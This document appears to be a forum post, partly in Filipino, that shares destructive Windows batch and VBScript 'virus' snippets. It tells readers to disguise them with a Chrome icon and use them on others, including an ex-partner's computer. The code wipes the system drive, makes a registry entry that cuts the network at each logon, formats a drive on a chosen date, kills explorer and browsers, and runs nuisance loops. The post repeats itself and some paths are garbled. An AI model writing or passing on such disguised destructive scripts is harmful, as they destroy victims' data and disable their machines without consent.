Use at your own risk
Steps :
1. Open notepad
2. Copy and paste the code
3. Save as (all files) anyname.bat in desktop or any location
4. Right click anyname.bat click properties then customize replace the icon... Example : googlechrome •...• haha
Kung gusto nyo test open mo -> I am not responsible for any damage or reporting about your pc
Here's now the code :
Delete all Content of the Drive
Disable Internet Permanently
Crush The Window[/B]
Endless Notepad
Bomb Virus
* pwedi mo e change yong date kung kailan mo gusto bombahin computer ng ex mo haha
The Crazy Caps Lock
Task Kill (send and destroy the victim & k!ll Operat!ng systeM)
Shutdown/logoff etc..
Read the following Form Of Switches :
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC. ..!!..!
Code:
Popping CD Drives
Hope you'll enjoy it hahaha
More and more virus to be spread
Update Later
Steps :
1. Open notepad
2. Copy and paste the code
3. Save as (all files) anyname.bat in desktop or any location
4. Right click anyname.bat click properties then customize replace the icon... Example : googlechrome •...• haha
Kung gusto nyo test open mo -> I am not responsible for any damage or reporting about your pc
Here's now the code :
Delete all Content of the Drive
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Disable Internet Permanently
Code:
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YourMessage here must be savage haha
[B]PAUSE
Crush The Window[/B]
Code:
@Echo off
Del C:\ *.* |y
Endless Notepad
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Bomb Virus
Code:
If %date% NEQ 2018/11/12 goto exit
format E: /y >nul
:exit
exit
The Crazy Caps Lock
Code:
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Task Kill (send and destroy the victim & k!ll Operat!ng systeM)
Code:
@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause
Shutdown/logoff etc..
Read the following Form Of Switches :
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC. ..!!..!
Code:
Code:
@echo off
shutdown -r -f -t 00
Popping CD Drives
Code:
Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
Hope you'll enjoy it hahaha
More and more virus to be spread
Update Later
